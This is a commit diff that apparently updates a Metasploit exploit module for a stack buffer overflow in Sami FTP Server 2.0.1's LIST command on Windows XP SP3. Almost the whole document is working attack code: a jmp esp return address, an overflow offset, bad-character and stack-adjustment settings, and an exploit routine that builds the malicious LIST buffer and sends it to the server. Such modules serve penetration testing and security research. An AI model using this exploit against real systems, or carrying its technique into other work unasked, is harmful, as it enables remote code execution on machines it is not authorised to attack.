dougsko
commit
8611109ffd
|
|
@ -8,16 +8,21 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit4 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
Rank = AverageRanking
|
||||
|
||||
include Msf::Exploit::Remote::Ftp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow',
|
||||
'Name' => 'Sami FTP Server LIST Command Buffer Overflow',
|
||||
'Description' => %q{
|
||||
A buffer overflow is triggered when a long LIST
|
||||
command is sent to the server while the user is viewing the Logs tab.
|
||||
This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1.
|
||||
The vulnerability exists in the processing of LIST commands. In order to trigger
|
||||
the vulnerability, the "Log" tab must be viewed in the Sami FTP Server managing
|
||||
application, in the target machine. On the other hand, the source IP address used
|
||||
to connect with the FTP Server is needed. If the user can't provide it, the module
|
||||
will try to resolve it. This module has been tested successfully on Sami FTP Server
|
||||
2.0.1 over Windows XP SP3.
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Author' =>
|
||||
|
|
@ -29,47 +34,46 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '90815'],
|
||||
[ 'EDB', '24557'],
|
||||
[ 'EDB', '24557']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 900,
|
||||
'BadChars' => "\x00\x0a\x0d\x20\xff",
|
||||
'StackAdjustment' => -3500,
|
||||
'Space' => 1500,
|
||||
'DisableNops' => true,
|
||||
'BadChars' => "\x00\x0a\x0d\x20\x5c",
|
||||
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Windows XP',
|
||||
[ 'Sami FTP Server 2.0.1 / Windows XP SP3',
|
||||
{
|
||||
'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll
|
||||
'Offset' => 225,
|
||||
},
|
||||
'Ret' => 0x10028283, # jmp esp from C:\Program Files\PMSystem\Temp\tmp0.dll
|
||||
'Offset' => 228
|
||||
}
|
||||
],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Feb 27 2013'))
|
||||
register_options(
|
||||
[
|
||||
OptString.new('IPADDR', [true, 'Attacker\'s IP address'])
|
||||
OptAddress.new('SOURCEIP', [false, 'The local client address'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect_login
|
||||
sleep 1
|
||||
|
||||
ip_length = datastore['IPADDR'].length - 3
|
||||
buf = rand_text_alphanumeric(target['Offset'] - ip_length)
|
||||
connect
|
||||
if datastore['SOURCEIP']
|
||||
ip_length = datastore['SOURCEIP'].length
|
||||
else
|
||||
ip_length = Rex::Socket.source_address(rhost).length
|
||||
end
|
||||
buf = rand_text(target['Offset'] - ip_length)
|
||||
buf << [ target['Ret'] ].pack('V')
|
||||
buf << rand_text(16)
|
||||
buf << payload.encoded
|
||||
|
||||
send_cmd( ['LIST', buf], false )
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue